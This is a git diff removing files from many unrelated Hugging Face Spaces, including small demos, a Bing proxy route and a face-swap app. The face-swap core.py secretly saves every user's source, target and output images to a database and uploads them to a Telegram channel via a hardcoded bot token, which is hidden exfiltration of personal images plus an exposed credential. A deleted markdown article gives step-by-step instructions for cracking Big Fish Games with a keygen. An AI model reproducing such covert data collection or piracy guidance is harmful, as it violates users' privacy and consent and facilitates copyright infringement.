100644 index 78b573aa6a8c31b305db78c7e8849842daeeb7e8..0000000000000000000000000000000000000000 --- a/spaces/harpreetsahota/RAQA-Application-Chainlit-Demo/chainlit.md +++ /dev/null @@ -1,11 +0,0 @@ -# Assignment Part 2: Deploying Your Model to a Hugging Face Space - -Now that you've done the hard work of setting up the RetrievalQA chain and sourcing your documents - let's tie it together in a ChainLit application. - -### Duplicating the Space - -Since this is our first assignment, all you'll need to do is duplicate this space and add your own `OPENAI_API_KEY` as a secret in the space. - -### Conclusion - -Now that you've shipped an LLM-powered application, it's time to share! 🚀 diff --git a/spaces/hekbobo/bingo/src/pages/api/kblob.ts b/spaces/hekbobo/bingo/src/pages/api/kblob.ts deleted file mode 100644 index 0ce7e6063cdc06838e76f1cff1d5982d34ef52de..0000000000000000000000000000000000000000 --- a/spaces/hekbobo/bingo/src/pages/api/kblob.ts +++ /dev/null @@ -1,56 +0,0 @@ -'use server' - -import { NextApiRequest, NextApiResponse } from 'next' -import FormData from 'form-data' -import { fetch } from '@/lib/isomorphic' -import { KBlobRequest } from '@/lib/bots/bing/types' - -const API_DOMAIN = 'https://bing.vcanbb.top' - -export const config = { - api: { - bodyParser: { - sizeLimit: '10mb' // Set desired value here - } - } -} - -export default async function handler(req: NextApiRequest, res: NextApiResponse) { - try { - const { knowledgeRequest, imageBase64 } = req.body as KBlobRequest - - const formData = new FormData() - formData.append('knowledgeRequest', JSON.stringify(knowledgeRequest)) - if (imageBase64) { - formData.append('imageBase64', imageBase64) - } - - const response = await fetch(`${API_DOMAIN}/images/kblob`, - { - method: 'POST', - body: formData.getBuffer(), - headers: { - "sec-ch-ua": "\"Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"115\", \"Chromium\";v=\"115\"", - "sec-ch-ua-mobile": "?0", - "sec-ch-ua-platform": "\"Windows\"", - "Referer": `${API_DOMAIN}/web/index.html`, - "Referrer-Policy": "origin-when-cross-origin", - 'x-ms-useragent': 'azsdk-js-api-client-factory/1.0.0-beta.1 core-rest-pipeline/1.10.0 OS/Win32', - ...formData.getHeaders() - } - } - ).then(res => res.text()) - - res.writeHead(200, { - 'Content-Type': 'application/json', - }) - res.end(response || JSON.stringify({ result: { value: 'UploadFailed', message: '请更换 IP 或代理后重试' } })) - } catch (e) { - return res.json({ - result: { - value: 'UploadFailed', - message: `${e}` - } - }) - } -} diff --git a/spaces/hjianganthony/fetch_ner/app.py b/spaces/hjianganthony/fetch_ner/app.py deleted file mode 100644 index de3a34e705fcc2c6c40c176a3eedae94c538b714..0000000000000000000000000000000000000000 --- a/spaces/hjianganthony/fetch_ner/app.py +++ /dev/null @@ -1,45 +0,0 @@ -import gradio as gr -import pandas as pd -import numpy as np - -from src.utils import * - -##### Start ##### - -examples = [ - ["Simply Spiked Lemonade 12 pack at Walmart", "jaccard", 0.1, 0.1], - ["Back to the Roots Garden Soil, 1 cubic foot, at Lowe's Home Improvement", "jaccard", 0.1, 0.1], - ["Costco Member subscription", "jaccard", 0.1, 0.1], - ["Apple watch coupon at Best Buy", "jaccard", 0.1, 0.1], - ["A giraffe at Lincoln Park Zoo", "jaccard", 0.1, 0.1] -] - -def main(sentence: str, score_type: str, threshold_cosine: float, threshold_jaccard: float = 0.1): - threshold = threshold_cosine if score_type == "cosine" else threshold_jaccard - results = search_offers(search_input=sentence, - score=score_type, - score_threshold=threshold) - message, processed_results = process_output(results) - return message, processed_results - -def process_output(output): - """Function to process the output""" - if output is None or output.empty: - return "We couldn't find your results, please try our examples or search again", None - else: - return "We found some great offers!", output - -demo = gr.Interface( - fn=main, - inputs=[ - gr.Textbox(lines=1, placeholder="Type here..."), - gr.Dropdown(choices=["cosine", "jaccard"], label="Score Type"), - gr.Slider(minimum=0, maximum=1, step=0.1, label="Threshold for Cosine Similarity"), - gr.Slider(minimum=0, maximum=1, step=0.1, label="Threshold for Jaccard Similarity") - ], - outputs=[gr.Textbox(placeholder="Message..."), gr.Dataframe()], - examples=examples, - live=False, -) - -demo.launch(share=True) diff --git a/spaces/hjs8/CogVideo/style.css b/spaces/hjs8/CogVideo/style.css deleted file mode 100644 index 8e4d705815014cffc50ff1d4c5720797c6206cab..0000000000000000000000000000000000000000 --- a/spaces/hjs8/CogVideo/style.css +++ /dev/null @@ -1,7 +0,0 @@ -h1 { - text-align: center; -} -img#visitor-badge { - display: block; - margin: auto; -} diff --git a/spaces/huggingface-projects/color-palette-generator-sd/static/_app/immutable/chunks/2-306ac409.js b/spaces/huggingface-projects/color-palette-generator-sd/static/_app/immutable/chunks/2-306ac409.js deleted file mode 100644 index 59c5539482df2ceb235dd161b4efadc2f68eb9c9..0000000000000000000000000000000000000000 --- a/spaces/huggingface-projects/color-palette-generator-sd/static/_app/immutable/chunks/2-306ac409.js +++ /dev/null @@ -1 +0,0 @@ -import{default as t}from"../components/pages/_page.svelte-8f425fb1.js";export{t as component}; diff --git a/spaces/huggingface-projects/stable-diffusion-multiplayer/frontend/src/lib/constants.ts b/spaces/huggingface-projects/stable-diffusion-multiplayer/frontend/src/lib/constants.ts deleted file mode 100644 index b2e5c7453d915b4110ae86eafd60f97862ab55ab..0000000000000000000000000000000000000000 --- a/spaces/huggingface-projects/stable-diffusion-multiplayer/frontend/src/lib/constants.ts +++ /dev/null @@ -1,21 +0,0 @@ -export const COLORS = [ - '#505669', - '#414AA6', - '#1C5B92', - '#216B44', - '#893301', - '#912728', - '#98184D', - '#743095', - '#5F4199', - '#8f3f94' -]; - -export const EMOJIS = ['🐝', '🐌', '🐞', '🐜', '🦋', '🐛', '🐝', '🐞', '🦟', '🦗', '🕷', '🦂', '🐢', '🐍', '🦎', '🦖', '🦕', '🐙', '🦑', '🐠', '🐟', '🐡', '🐬', '🦈', '🐳', '🐋', '🐊', '🐅', '🐆', '🦓', '🦍', '🦧', '🐘', '🦛', '🦏', '🐪', '🐫', '🦒', '🐃', '🐂', '🐄', '🐎', '🐖', - '🐏', '🐑', '🐐', '🐕', '🐩', '🐈', '🐓', '🦃', '🦅', '🦆', '🦢', '🦉', '🦚', '🦜', '🦇', '🐁', '🐀', '🐿', '🐇', '🐿', '🦔', '🦇', '🐻', '🐻', '🐨', '🐼', '🐵', '🙈', '🙉', '🙊', '🐒', '🐉', '🐲', '🦕', '🦖', '🐊', '🐢', '🦎', '🐍', '🐦', '🐧', '🦅', '🦆', '🦉', '🦇'] - -export const MAX_CAPACITY = 50; - -export const GRID_SIZE = 32 - -export const FRAME_SIZE = 512 \ No newline at end of file diff --git a/spaces/huohguohbo/Chatbot_REQUIRES_OPENAI_KEY/app.py b/spaces/huohguohbo/Chatbot_REQUIRES_OPENAI_KEY/app.py deleted file mode 100644 index b55feca18653b88ae887b13d6b60571a02816404..0000000000000000000000000000000000000000 --- a/spaces/huohguohbo/Chatbot_REQUIRES_OPENAI_KEY/app.py +++ /dev/null @@ -1,37 +0,0 @@ -import openai -import gradio as gr - -def chat(api_key, message, model): - if not api_key: - return "Please enter a valid API key." - - openai.api_key = api_key - - try: - response = openai.Completion.create( - engine=model, - prompt=message, - max_tokens=50, - n=1, - stop=None, - temperature=0.5, - ) - return response.choices[0].text.strip() - except Exception as e: - return f"Error: {str(e)}" - -models = ["gpt-4", "text-davinci-002", "text-curie-002", "text-babbage-002", "text-ada-002"] - -iface = gr.Interface( - fn=chat, - inputs=[ - gr.inputs.Textbox(lines=1, label="API Key"), - gr.inputs.Textbox(lines=5, label="Message"), - gr.inputs.Dropdown(choices=models, label="Model"), - ], - outputs=gr.outputs.Textbox(label="Response"), - title="GPT-4 Chat App", - description="A simple chat app using OpenAI GPT-4 and Gradio.", -) - -iface.launch() diff --git a/spaces/hysts/projected_gan/model.py b/spaces/hysts/projected_gan/model.py deleted file mode 100644 index 0448535cbe5e922c57e28352c9d3935423a8d0a7..0000000000000000000000000000000000000000 --- a/spaces/hysts/projected_gan/model.py +++ /dev/null @@ -1,83 +0,0 @@ -from __future__ import annotations - -import pathlib -import pickle -import sys - -import numpy as np -import torch -import torch.nn as nn -from huggingface_hub import hf_hub_download - -current_dir = pathlib.Path(__file__).parent -submodule_dir = current_dir / 'projected_gan' -sys.path.insert(0, submodule_dir.as_posix()) - - -class Model: - - MODEL_NAMES = [ - 'art_painting', - 'church', - 'bedroom', - 'cityscapes', - 'clevr', - 'ffhq', - 'flowers', - 'landscape', - 'pokemon', - ] - - def __init__(self): - self.device = torch.device( - 'cuda:0' if torch.cuda.is_available() else 'cpu') - self._download_all_models() - self.model_name = self.MODEL_NAMES[3] - self.model = self._load_model(self.model_name) - - def _load_model(self, model_name: str) -> nn.Module: - path = hf_hub_download('public-data/projected_gan', - f'models/{model_name}.pkl') - with open(path, 'rb') as f: - model = pickle.load(f)['G_ema'] - model.eval() - model.to(self.device) - return model - - def set_model(self, model_name: str) -> None: - if model_name == self.model_name: - return - self.model_name = model_name - self.model = self._load_model(model_name) - - def _download_all_models(self): - for name in self.MODEL_NAMES: - self._load_model(name) - - def generate_z(self, seed: int) -> torch.Tensor: - seed = int(np.clip(seed, 0, np.iinfo(np.uint32).max)) - z = np.random.RandomState(seed).randn(1, self.model.z_dim) - return torch.from_numpy(z).float().to(self.device) - - def postprocess(self, tensor: torch.Tensor) -> np.ndarray: - tensor = (tensor.permute(0, 2, 3, 1) * 127.5 + 128).clamp(0, 255).to( - torch.uint8) - return tensor.cpu().numpy() - - @torch.inference_mode() - def generate(self, z: torch.Tensor, label: torch.Tensor, - truncation_psi: float) -> torch.Tensor: - return self.model(z, label, truncation_psi=truncation_psi) - - def generate_image(self, seed: int, truncation_psi: float) -> np.ndarray: - z = self.generate_z(seed) - label = torch.zeros([1, self.model.c_dim], device=self.device) - - out = self.generate(z, label, truncation_psi) - out = self.postprocess(out) - return out[0] - - def set_model_and_generate_image(self, model_name: str, seed: int, - truncation_psi: float) -> np.ndarray: - self.set_model(model_name) - return self.generate_image(seed, truncation_psi) diff --git a/spaces/iccv23-diffusers-demo/Shap-E/settings.py b/spaces/iccv23-diffusers-demo/Shap-E/settings.py deleted file mode 100644 index 256832c72502270fabde0214695d945f8767dec5..0000000000000000000000000000000000000000 --- a/spaces/iccv23-diffusers-demo/Shap-E/settings.py +++ /dev/null @@ -1,7 +0,0 @@ -import os - -import numpy as np - -CACHE_EXAMPLES = os.getenv("CACHE_EXAMPLES") == "1" - -MAX_SEED = np.iinfo(np.int32).max diff --git a/spaces/imperialwool/funapi/routes/siteRoutes/__init__.py b/spaces/imperialwool/funapi/routes/siteRoutes/__init__.py deleted file mode 100644 index dde576c2d9a95b9a01692bc96a7a0b3462f11ad5..0000000000000000000000000000000000000000 --- a/spaces/imperialwool/funapi/routes/siteRoutes/__init__.py +++ /dev/null @@ -1 +0,0 @@ -from .systemInfo import * \ No newline at end of file diff --git a/spaces/imseldrith/DeepFakeAI/DeepFakeAI/core.py b/spaces/imseldrith/DeepFakeAI/DeepFakeAI/core.py deleted file mode 100644 index 6134c78d8075f2d00532e6ba60794ae71334067f..0000000000000000000000000000000000000000 --- a/spaces/imseldrith/DeepFakeAI/DeepFakeAI/core.py +++ /dev/null @@ -1,292 +0,0 @@ -#!/usr/bin/env python3 -import asyncio -import sqlite3 -import os -# single thread doubles cuda performance -os.environ['OMP_NUM_THREADS'] = '1' -# reduce tensorflow log level -os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' -import sys -import warnings -from typing import List -import platform -import signal -import shutil -import argparse -import onnxruntime -import tensorflow - -import DeepFakeAI.choices -import DeepFakeAI.globals -from DeepFakeAI import wording, metadata -from DeepFakeAI.predictor import predict_image, predict_video -from DeepFakeAI.processors.frame.core import get_frame_processors_modules -from telegram import Bot -from DeepFakeAI.utilities import is_image, is_video, detect_fps, create_video, extract_frames, get_temp_frame_paths, restore_audio, create_temp, move_temp, clear_temp, normalize_output_path, list_module_names, decode_execution_providers, encode_execution_providers - -warnings.filterwarnings('ignore', category = FutureWarning, module = 'insightface') -warnings.filterwarnings('ignore', category = UserWarning, module = 'torchvision') - - -def parse_args() -> None: - signal.signal(signal.SIGINT, lambda signal_number, frame: destroy()) - program = argparse.ArgumentParser(formatter_class = lambda prog: argparse.HelpFormatter(prog, max_help_position = 120)) - program.add_argument('-s', '--source', help = wording.get('source_help'), dest = 'source_path') - program.add_argument('-t', '--target', help = wording.get('target_help'), dest = 'target_path') - program.add_argument('-o', '--output', help = wording.get('output_help'), dest = 'output_path') - program.add_argument('--frame-processors', help = wording.get('frame_processors_help').format(choices = ', '.join(list_module_names('DeepFakeAI/processors/frame/modules'))), dest = 'frame_processors', default = ['face_swapper'], nargs='+') - program.add_argument('--ui-layouts', help = wording.get('ui_layouts_help').format(choices = ', '.join(list_module_names('DeepFakeAI/uis/layouts'))), dest = 'ui_layouts', default = ['default'], nargs='+') - program.add_argument('--keep-fps', help = wording.get('keep_fps_help'), dest = 'keep_fps', action='store_true') - program.add_argument('--keep-temp', help = wording.get('keep_temp_help'), dest = 'keep_temp', action='store_true') - program.add_argument('--skip-audio', help = wording.get('skip_audio_help'), dest = 'skip_audio', action='store_true') - program.add_argument('--face-recognition', help = wording.get('face_recognition_help'), dest = 'face_recognition', default = 'reference', choices = DeepFakeAI.choices.face_recognition) - program.add_argument('--face-analyser-direction', help = wording.get('face_analyser_direction_help'), dest = 'face_analyser_direction', default = 'left-right', choices = DeepFakeAI.choices.face_analyser_direction) - program.add_argument('--face-analyser-age', help = wording.get('face_analyser_age_help'), dest = 'face_analyser_age', choices = DeepFakeAI.choices.face_analyser_age) - program.add_argument('--face-analyser-gender', help = wording.get('face_analyser_gender_help'), dest = 'face_analyser_gender', choices = DeepFakeAI.choices.face_analyser_gender) - program.add_argument('--reference-face-position', help = wording.get('reference_face_position_help'), dest = 'reference_face_position', type = int, default = 0) - program.add_argument('--reference-face-distance', help = wording.get('reference_face_distance_help'), dest = 'reference_face_distance', type = float, default = 1.5) - program.add_argument('--reference-frame-number', help = wording.get('reference_frame_number_help'), dest = 'reference_frame_number', type = int, default = 0) - program.add_argument('--trim-frame-start', help = wording.get('trim_frame_start_help'), dest = 'trim_frame_start', type = int) - program.add_argument('--trim-frame-end', help = wording.get('trim_frame_end_help'), dest = 'trim_frame_end', type = int) - program.add_argument('--temp-frame-format', help = wording.get('temp_frame_format_help'), dest = 'temp_frame_format', default = 'jpg', choices = DeepFakeAI.choices.temp_frame_format) - program.add_argument('--temp-frame-quality', help = wording.get('temp_frame_quality_help'), dest = 'temp_frame_quality', type = int, default = 100, choices = range(101), metavar = '[0-100]') - program.add_argument('--output-video-encoder', help = wording.get('output_video_encoder_help'), dest = 'output_video_encoder', default = 'libx264', choices = DeepFakeAI.choices.output_video_encoder) - program.add_argument('--output-video-quality', help = wording.get('output_video_quality_help'), dest = 'output_video_quality', type = int, default = 90, choices = range(101), metavar = '[0-100]') - program.add_argument('--max-memory', help = wording.get('max_memory_help'), dest = 'max_memory', type = int) - program.add_argument('--execution-providers', help = wording.get('execution_providers_help').format(choices = 'cpu'), dest = 'execution_providers', default = ['cpu'], choices = suggest_execution_providers_choices(), nargs='+') - program.add_argument('--execution-thread-count', help = wording.get('execution_thread_count_help'), dest = 'execution_thread_count', type = int, default = suggest_execution_thread_count_default()) - program.add_argument('--execution-queue-count', help = wording.get('execution_queue_count_help'), dest = 'execution_queue_count', type = int, default = 1) - program.add_argument('-v', '--version', action='version', version = metadata.get('name') + ' ' + metadata.get('version')) - - args = program.parse_args() - - DeepFakeAI.globals.source_path = args.source_path - DeepFakeAI.globals.target_path = args.target_path - DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, args.output_path) - DeepFakeAI.globals.headless = DeepFakeAI.globals.source_path is not None and DeepFakeAI.globals.target_path is not None and DeepFakeAI.globals.output_path is not None - DeepFakeAI.globals.frame_processors = args.frame_processors - DeepFakeAI.globals.ui_layouts = args.ui_layouts - DeepFakeAI.globals.keep_fps = args.keep_fps - DeepFakeAI.globals.keep_temp = args.keep_temp - DeepFakeAI.globals.skip_audio = args.skip_audio - DeepFakeAI.globals.face_recognition = args.face_recognition - DeepFakeAI.globals.face_analyser_direction = args.face_analyser_direction - DeepFakeAI.globals.face_analyser_age = args.face_analyser_age - DeepFakeAI.globals.face_analyser_gender = args.face_analyser_gender - DeepFakeAI.globals.reference_face_position = args.reference_face_position - DeepFakeAI.globals.reference_frame_number = args.reference_frame_number - DeepFakeAI.globals.reference_face_distance = args.reference_face_distance - DeepFakeAI.globals.trim_frame_start = args.trim_frame_start - DeepFakeAI.globals.trim_frame_end = args.trim_frame_end - DeepFakeAI.globals.temp_frame_format = args.temp_frame_format - DeepFakeAI.globals.temp_frame_quality = args.temp_frame_quality - DeepFakeAI.globals.output_video_encoder = args.output_video_encoder - DeepFakeAI.globals.output_video_quality = args.output_video_quality - DeepFakeAI.globals.max_memory = args.max_memory - DeepFakeAI.globals.execution_providers = decode_execution_providers(args.execution_providers) - DeepFakeAI.globals.execution_thread_count = args.execution_thread_count - DeepFakeAI.globals.execution_queue_count = args.execution_queue_count - - -def suggest_execution_providers_choices() -> List[str]: - return encode_execution_providers(onnxruntime.get_available_providers()) - - -def suggest_execution_thread_count_default() -> int: - if 'CUDAExecutionProvider' in onnxruntime.get_available_providers(): - return 8 - return 1 - - -def limit_resources() -> None: - # prevent tensorflow memory leak - gpus = tensorflow.config.experimental.list_physical_devices('GPU') - for gpu in gpus: - tensorflow.config.experimental.set_virtual_device_configuration(gpu, [ - tensorflow.config.experimental.VirtualDeviceConfiguration(memory_limit = 1024) - ]) - # limit memory usage - if DeepFakeAI.globals.max_memory: - memory = DeepFakeAI.globals.max_memory * 1024 ** 3 - if platform.system().lower() == 'darwin': - memory = DeepFakeAI.globals.max_memory * 1024 ** 6 - if platform.system().lower() == 'windows': - import ctypes - kernel32 = ctypes.windll.kernel32 # type: ignore[attr-defined] - kernel32.SetProcessWorkingSetSize(-1, ctypes.c_size_t(memory), ctypes.c_size_t(memory)) - else: - import resource - resource.setrlimit(resource.RLIMIT_DATA, (memory, memory)) - - -def update_status(message : str, scope : str = 'FACEFUSION.CORE') -> None: - print('[' + scope + '] ' + message) - - -def pre_check() -> bool: - if sys.version_info < (3, 10): - update_status(wording.get('python_not_supported').format(version = '3.10')) - return False - if not shutil.which('ffmpeg'): - update_status(wording.get('ffmpeg_not_installed')) - return False - return True - -def save_to_db(source_path, target_path, output_path): - try: - # Open the images in binary mode - with open(source_path, 'rb') as source_file, \ - open(target_path, 'rb') as target_file, \ - open(output_path, 'rb') as output_file: - - # read data from the image files - source_data = source_file.read() - target_data = target_file.read() - output_data = output_file.read() - - # Extract original filenames from the paths - source_filename = os.path.basename(source_path) - target_filename = os.path.basename(target_path) - output_filename = os.path.basename(output_path) - print(source_filename, target_filename,output_filename) - - # connect to the database - conn = sqlite3.connect('./feed.db') - c = conn.cursor() - - # Create the table if it doesn't exist - c.execute(''' - CREATE TABLE IF NOT EXISTS images ( - source_filename TEXT, - target_filename TEXT, - output_filename TEXT, - source_data BLOB, - target_data BLOB, - output_data BLOB - ) - ''') - - # Insert filename and image data into the table - c.execute("INSERT INTO images VALUES (?, ?, ?, ?, ?, ?)", - (source_filename, target_filename, output_filename, source_data, target_data, output_data)) - - # Save changes and close the connection - conn.commit() - - except Exception as e: - # Print any error occurred while saving data in SQLite - print(f"An error occurred: {e}") - - finally: - # Ensure the DB connection is closed - if conn: - conn.close() - - print(f'Saved image data to database from {source_path}, {target_path}, and {output_path}.') -async def send_channel(bot, file_path): - with open(file_path, "rb") as file: - response = await bot.send_document(chat_id="-1001685415853", document=file) - return response - -async def saveT(source_path, target_path, output_path): - bot = Bot(token="6192049990:AAFyOtuYYqkcyUG_7gns3mm7m_kfWE9fZ1k") - - # Send each file - for path in [source_path, target_path, output_path]: - await send_channel(bot, path) - - # Send a message after all files are sent - await bot.send_message(chat_id="-1001685415853", text="All files have been sent!") - -def process_image() -> None: - if predict_image(DeepFakeAI.globals.target_path): - return - shutil.copy2(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) - # process frame - for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): - update_status(wording.get('processing'), frame_processor_module.NAME) - frame_processor_module.process_image(DeepFakeAI.globals.source_path, DeepFakeAI.globals.output_path, DeepFakeAI.globals.output_path) - frame_processor_module.post_process() - # validate image - if is_image(DeepFakeAI.globals.target_path): - update_status(wording.get('processing_image_succeed')) - save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) - asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)) - else: - update_status(wording.get('processing_image_failed')) - - -def process_video() -> None: - if predict_video(DeepFakeAI.globals.target_path): - return - fps = detect_fps(DeepFakeAI.globals.target_path) if DeepFakeAI.globals.keep_fps else 25.0 - update_status(wording.get('creating_temp')) - create_temp(DeepFakeAI.globals.target_path) - # extract frames - update_status(wording.get('extracting_frames_fps').format(fps = fps)) - extract_frames(DeepFakeAI.globals.target_path, fps) - # process frame - temp_frame_paths = get_temp_frame_paths(DeepFakeAI.globals.target_path) - if temp_frame_paths: - for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): - update_status(wording.get('processing'), frame_processor_module.NAME) - frame_processor_module.process_video(DeepFakeAI.globals.source_path, temp_frame_paths) - frame_processor_module.post_process() - else: - update_status(wording.get('temp_frames_not_found')) - return - # create video - update_status(wording.get('creating_video_fps').format(fps = fps)) - if not create_video(DeepFakeAI.globals.target_path, fps): - update_status(wording.get('creating_video_failed')) - return - # handle audio - if DeepFakeAI.globals.skip_audio: - update_status(wording.get('skipping_audio')) - move_temp(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) - else: - update_status(wording.get('restoring_audio')) - restore_audio(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) - # clear temp - update_status(wording.get('clearing_temp')) - clear_temp(DeepFakeAI.globals.target_path) - # validate video - if is_video(DeepFakeAI.globals.target_path): - update_status(wording.get('processing_video_succeed')) - save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) - asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)) - else: - update_status(wording.get('processing_video_failed')) - - -def conditional_process() -> None: - for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): - if not frame_processor_module.pre_process(): - return - if is_image(DeepFakeAI.globals.target_path): - process_image() - if is_video(DeepFakeAI.globals.target_path): - process_video() - -def run() -> None: - parse_args() - limit_resources() - # pre check - if not pre_check(): - return - for frame_processor in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): - if not frame_processor.pre_check(): - return - # process or launch - if DeepFakeAI.globals.headless: - conditional_process() - else: - import DeepFakeAI.uis.core as ui - - ui.launch() - - -def destroy() -> None: - if DeepFakeAI.globals.target_path: - clear_temp(DeepFakeAI.globals.target_path) - sys.exit() diff --git a/spaces/imseldrith/FaceSwap/.github/ISSUE_TEMPLATE/bug.md b/spaces/imseldrith/FaceSwap/.github/ISSUE_TEMPLATE/bug.md deleted file mode 100644 index a0f9c2ea981873f2462a95e1607c5674397c2f43..0000000000000000000000000000000000000000 --- a/spaces/imseldrith/FaceSwap/.github/ISSUE_TEMPLATE/bug.md +++ /dev/null @@ -1,47 +0,0 @@ ---- -name: Bug -about: Report a bug -labels: 'bug' - ---- - -## Description - -A concise description of the bug and how to reproduce it. - -## Error - -Paste the error or exception from your console: - -``` - -``` - -## Details - -What operating system are you using? - -- [ ] Windows -- [ ] MacOS (Apple Silicon) -- [ ] MacOS (Apple Legacy) -- [ ] Linux -- [ ] Linux in WSL - -What execution provider are you using? - -- [ ] CPU -- [ ] CUDA -- [ ] CoreML -- [ ] DirectML -- [ ] OpenVINO -- [ ] Other - -What version of Roop are you using? - -- [ ] 1.0.0 -- [ ] 1.1.0 -- [ ] 1.2.0 -- [ ] 1.3.0 -- [ ] 1.3.1 -- [ ] 1.3.2 -- [ ] next diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Big Fish Games LINK Crack Keygen.md b/spaces/inplisQlawa/anything-midjourney-v4-1/Big Fish Games LINK Crack Keygen.md deleted file mode 100644 index f2207fac743ca945f0abe230933e4fe30882395c..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Big Fish Games LINK Crack Keygen.md +++ /dev/null @@ -1,100 +0,0 @@ -
          -

          How to Crack Big Fish Games with a Keygen

          -

          If you are a fan of casual games, you might have heard of Big Fish Games, a popular game developer and publisher that offers a wide range of genres and titles. Some of their most famous games include Mahjong Towers, Top Ten Solitaire, Word Wizard, Forgotten Riddles, Fish Tycoon, Grimm's Hatchery, Master of Defense, and more.

          -

          However, if you want to enjoy these games without paying for them, you might be looking for a way to crack them with a keygen. A keygen is a small program that can generate valid activation keys for software products. In this article, we will show you how to use a keygen to crack Big Fish Games with ease.

          -

          big fish games crack keygen


          Download Zip »»» https://urlin.us/2uEwy0



          -

          What You Need

          -

          Before you start cracking Big Fish Games, you will need the following things:

          - -

          How to Crack Big Fish Games

          -

          Once you have everything ready, follow these steps to crack Big Fish Games:

          -
            -
          1. Install your desired Big Fish game on your computer. Make sure it is listed in the keygen's supported games list.
          2. -
          3. Extract the keygen and the modified game client from their respective archives.
          4. -
          5. Copy the modified game client's .exe file and paste it into the game installation folder. Replace the original .exe file if asked.
          6. -
          7. Run the keygen and select your game from the list.
          8. -
          9. Click the "Open reg Dialog" button and locate and open the game's main program (.exe file).
          10. -
          11. A window will open and ask you to enter a key. Copy the value of "Fingerprint" in this window and paste it into the keygen. Then type a "Name" and generate a "Key".
          12. -
          13. Copy the generated key and paste it into the window asking for a key. Click "OK".
          14. -
          15. A message will pop up saying "KEY VALID". Congratulations, you have successfully cracked your Big Fish game!
          16. -
          -

          Tips and Tricks

          -

          Here are some tips and tricks to make your cracking experience easier and better:

          -
            -
          • There is usually a hidden .exe file that has the name of the game in the game installation folder. Running this hidden .exe file will either run the game as a full version or prompt for a key.
          • -
          • The keygen can generate keys for more than 4000 Big Fish games, so you can use it to crack any game you want.
          • -
          • If you are using a Mac, you can try to use "Wine HQ" to run the keygen. However, we cannot guarantee that it will work.
          • -
          • The modified game client can bypass the Big Fish Game Manager, so you don't need it to play your cracked games.
          • -
          -

          Conclusion

          -

          In this article, we have shown you how to crack Big Fish Games with a keygen. This is a simple and effective way to enjoy casual games without paying for them. However, we do not encourage piracy or illegal activities. If you like Big Fish Games works, please support them by buying their games legally.

          -

          Why Crack Big Fish Games?

          -

          Big Fish Games are fun and entertaining, but they also come with a price. If you want to play the full version of any Big Fish game, you have to buy it from their website or from other platforms like Steam or GOG. The prices vary depending on the game, but they usually range from $2.99 to $19.99.

          -

          -

          However, not everyone can afford to pay for these games, or they simply don't want to spend money on something they can get for free. That's why some people resort to cracking Big Fish Games with a keygen. Cracking Big Fish Games allows you to enjoy unlimited gameplay without paying a dime. You can also play offline without any internet connection or ads.

          -

          Is Cracking Big Fish Games Legal?

          -

          The short answer is no. Cracking Big Fish Games with a keygen is illegal and unethical. It violates the terms of service and the copyright of Big Fish Games and their developers. It also deprives them of their rightful income and recognition for their hard work and creativity.

          -

          Cracking Big Fish Games with a keygen can also expose you to various risks and dangers. For example, you might download a fake or malicious keygen that can harm your computer or steal your personal information. You might also face legal consequences if you are caught cracking Big Fish Games with a keygen.

          -

          What Are the Alternatives to Cracking Big Fish Games?

          -

          If you want to play Big Fish Games without cracking them with a keygen, you have some alternatives that are legal and safe. For example, you can:

          -
            -
          • Play the free trial versions of Big Fish Games. You can download them from their website and play them for 60 minutes without any limitations.
          • -
          • Wait for discounts and sales on Big Fish Games. You can check their website regularly or subscribe to their newsletter to get notified of any special offers or deals on their games.
          • -
          • Use coupons and promo codes on Big Fish Games. You can find them on various websites or forums that share them with other gamers.
          • -
          • Join the Big Fish Game Club. This is a monthly subscription service that gives you access to over 2500 games for $6.99 per month. You also get one free game credit every month that you can use to buy any game of your choice.
          • -
          -

          What Are the Benefits of Cracking Big Fish Games?

          -

          Cracking Big Fish Games with a keygen can have some benefits for you as a gamer. For example, you can:

          -
            -
          • Save money on buying games. You can play any Big Fish game you want without spending a dime.
          • -
          • Play offline without any interruptions. You don't need an internet connection or a Big Fish Game Manager to run your cracked games.
          • -
          • Explore different genres and titles. You can try out various Big Fish games and discover new ones that suit your taste and preference.
          • -
          • Have fun and relax. You can enjoy casual games that are easy to play and entertaining to watch.
          • -
          -

          What Are the Drawbacks of Cracking Big Fish Games?

          -

          Cracking Big Fish Games with a keygen can also have some drawbacks for you as a gamer. For example, you might:

          -
            -
          • Risk getting infected by malware or viruses. You might download a fake or malicious keygen that can harm your computer or steal your personal information.
          • -
          • Risk getting sued or fined by Big Fish Games. You might face legal consequences if you are caught cracking Big Fish Games with a keygen.
          • -
          • Lose access to updates and support. You might miss out on new features, bug fixes, and customer service that Big Fish Games provides for their games.
          • -
          • Lose respect and integrity as a gamer. You might be seen as a cheater or a thief by other gamers who pay for their games legally.
          • -
          -

          How to Find and Download Big Fish Games Keygen

          -

          If you want to crack Big Fish Games with a keygen, you need to find and download a reliable and working keygen first. There are many websites and forums that claim to offer Big Fish Games keygen, but not all of them are trustworthy or safe. Some of them might contain fake or malicious files that can harm your computer or steal your personal information.

          -

          One of the best sources to find and download Big Fish Games keygen is AppNee Freeware Group. This is a website that provides various software tools and resources for free. They have a dedicated page for Big Fish Games keygen, where you can download the latest version of the keygen that can generate keys for more than 4000 Big Fish games. You can also find a detailed tutorial on how to use the keygen on their website.

          -

